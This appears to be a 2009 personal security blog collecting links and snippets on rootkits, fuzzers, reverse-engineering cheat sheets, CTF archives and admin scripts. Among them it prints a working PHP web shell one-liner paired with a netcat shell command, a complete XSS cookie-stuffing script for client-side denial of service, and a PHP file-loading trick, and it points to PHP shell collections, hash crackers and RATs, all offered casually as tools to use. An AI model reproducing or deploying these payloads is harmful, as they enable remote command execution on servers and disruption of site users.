Friday, May 29, 2009

What is a Rootkit? You sure?

A very well written article on some of the history and details of what a “rootkit” is:


“Underground Hacking” Links

Here are just some sites that I wanted to get off my open tabs and check out later – standard warning applies, do not inherently trust what you find on these pages: (Yes you have seen this one before, but in reference to their RAT)


Un.Aware eZine

Uninformed eZine

Phrack eZine

Phrack issue #64 by TCOLH - “A brief history of the Underground scene”

Tuesday, May 26, 2009

Force Windows Update Script

Stolen from:

Copy and Paste the code below into a text file and name it AUForceUpdate.cmd

@echo off
Echo This batch file will Force the Update Detection from the AU client: 
Echo 1. Stops the Automatic Updates Service (wuauserv)
Echo 2. Deletes the LastWaitTimeout registry key (if it exists) 
Echo 3. Deletes the DetectionStartTime registry key (if it exists) 
Echo 4. Deletes the NextDetectionTime registry key (if it exists)
Echo 5. Restart the Automatic Updates Service (wuauserv) 
Echo 6. Force the detection 
@echo on
net stop wuauserv
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v LastWaitTimeout /f
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v DetectionStartTime /f
Reg Delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update" /v NextDetectionTime /f
net start wuauserv
wuauclt /detectnow
@echo off
Echo This AU client will now check for the Updates on the Local WSUS Server.

tail -f, I must leave you for another

Stolen from:

tail -f

This tails the log file and the '-f' tells tail to follow the file, so anything new added to the file will also be printed to the screen.

Another option is:

less +F /var/log/messages

The +F option turns on less 'follow mode'. It is similar to tail -f but you will have the benefits of less, like scrolling up and down. To stop tailing, use Ctrl-C and to resume it, press Shift-F.

Durzosploit - Javascript Exploit Generator

Takes script('XSS Working'); to the next level:

Thursday, May 21, 2009

A Cheat, A Method and a Book

So I wanted to get these down before they scrolled by in twitter:

Nick Harbour's Reverse Engineering Cheat Sheet:

Lenny Zeltser's Reverse Engineering Cheat Sheet:

And the Unix Toolbox. DO NOT underestimate the power of this booklet:

Tuesday, May 19, 2009

Defcon CTF and Qualifiers: Past Challenges and Answers

Even if you have never competed and are not signed up to compete this year, there is a ton of learning to be had just from what they have done in the past. Take the time to look at the answers and learn from them.

100 Free Online Courses (MIT and such)

Tarantula - A fuzzing spider

The only homepage I could find:

Their quote:
a big hairy fuzzy spider that crawls your site, wreaking havoc

Haven't tried it yet, plan to.

Handwriting Analysis book on Scribd

If you haven't checked out Scribd before, there are a bunch of great books for free there. One of which is:

Handwriting Analysis & Success Secrets by Bart A Baggett

Dranzer - ActiveX Fuzzer

Here is what they say about it:

Attackers frequently take advantage of vulnerabilities in ActiveX controls to compromise systems using Microsoft Internet Explorer. A programming or design flaw in an ActiveX control can allow an attacker to execute arbitrary code by convincing a user to view a specially crafted web page. Since 2000, we have seen a significant increase in vulnerabilities in ActiveX controls.

We have developed Dranzer, a tool that enables users to examine effective techniques for fuzz testing ActiveX controls. By testing a large number of ActiveX controls, we can provide some insight into the current state of ActiveX security. When we discover new vulnerabilities, we practice responsible disclosure principles and perform the necessary remediation steps.

OfficeCat: Look for Exploits in MS Office Documents

Recently commented on by BreakingPoint (here) as the tool to use when looking for exploits in Office Documents.

Created by Lurene Grenier of the Sourcefire VRT:

Friday, May 15, 2009

PHP 1-line execute

<?php system($_GET[cmd]);?>

echo that to a file on a system, or use the previous example to call it, and you can run -lvp 4040 -e /bin/bash and you'll have a shell waiting for you.

Load txt file as PHP

A pretty sick use of php ;-)

       $shell = ""; //use something less obvious like readme.txt
       $code = file_get_contents($shell);
       fwrite($fp, $code);

Shell Code Development

Place has some pretty sick shellcode:

Huge List of Online Crackers

Don't know if all of these are online still or not:

md5: - Does Norwegian words too (for those who can’t read Russian: put your md5 in the second box)…roducts_ id=7




User Profile Deletion Utility

Index of PHP Shells


Thursday, May 14, 2009

Finding SUID/SGID root programs


EDIT: It doesn't look like it, but it's all one line:
find / -type f \( -perm -04000 -o -perm -02000 \) -exec ls -lg {} \;
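
The same find test can drive a recurring audit: record the SUID/SGID files you have reviewed in a baseline and report only what is new. The script below is an added example, not from the original post; the function names, the baseline file format (one path per line) and the output format are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post: flag SUID/SGID files under a
# directory that are absent from a reviewed baseline (one path per line).

# list_setid DIR: sorted paths of regular files with SUID or SGID set.
# -xdev stays on one filesystem so /proc and network mounts are skipped.
list_setid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print \
        2>/dev/null | LC_ALL=C sort
}

# classify FILE: print "suid", "sgid" or "suid+sgid".
classify() {
    kind=""
    [ -u "$1" ] && kind="suid"
    [ -g "$1" ] && kind="${kind:+$kind+}sgid"
    printf '%s\n' "$kind"
}

# audit_setid DIR BASELINE: print "NEW <kind> <owner> <path>" for every
# set-id file missing from BASELINE; return 1 if any were found.
audit_setid() {
    rc=0
    cur=$(mktemp) && base=$(mktemp) && new=$(mktemp) || return 2
    list_setid "$1" > "$cur"
    LC_ALL=C sort -u "$2" > "$base"
    # comm -23 keeps lines that appear only in the current scan.
    LC_ALL=C comm -23 "$cur" "$base" > "$new"
    while IFS= read -r f; do
        owner=$(ls -ld -- "$f" | awk '{print $3}')
        printf 'NEW %s %s %s\n' "$(classify "$f")" "$owner" "$f"
        rc=1
    done < "$new"
    rm -f "$cur" "$base" "$new"
    return "$rc"
}

# Usage: sh setid_audit.sh DIR BASELINE
if [ "$#" -eq 2 ]; then
    audit_setid "$1" "$2"
fi
```

A non-zero exit status makes it easy to alert from cron when a set-id file appears that nobody has reviewed.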

Wednesday, May 13, 2009

WIGS - Website Information Gathering Scanner

A TON of information, in one click without touching the site yourself.. ;-)

Also, my other favorite is:

Tuesday, May 12, 2009

List of x86 Instructions

Don't Censor Me!

An awesome repository of interesting do-dads and toys for hackers / security 'pros'

Proceed with caution. There are pointy objects ahead:

"Official" Metasploit Documentation

Hex Editor - Frhed

I've been searching for a free hex editor that had the features I need and the search is finally over.

Thanks @marcusjcarey

Sunday, May 10, 2009

XSS based Client-side DoS

Stuffs the client's browser with 200KB of cookies per subdomain for the site.

/*<script>/*code to create a 200KB of cookies per subdomain*/with(document)domain.replace(/[^.]*\.?/g,function(a){try{domain=domain.replace(a,"")}catch(e){a=""}finally{for(i=0;i<50;i++)cookie=i+"="+Array(4095)+";expires=9 Jan 2038 23:59 GMT;path=/;domain=."+a+domain}})//</script>

I pasted the code in case it gets lost on Pastebin

Fravia's Swansong

Saturday, May 9, 2009

This is why you're fat

Not security related, but hilarious. Come on, who hasn't had a Choco Taco.

Sunday, May 3, 2009

Stock Photo Sites

Links to 16 of them. Why is this good for you? It will help with those presentations you have to give:


Another really fun RAT to play with:


RAT, and some interesting history dumping ;-)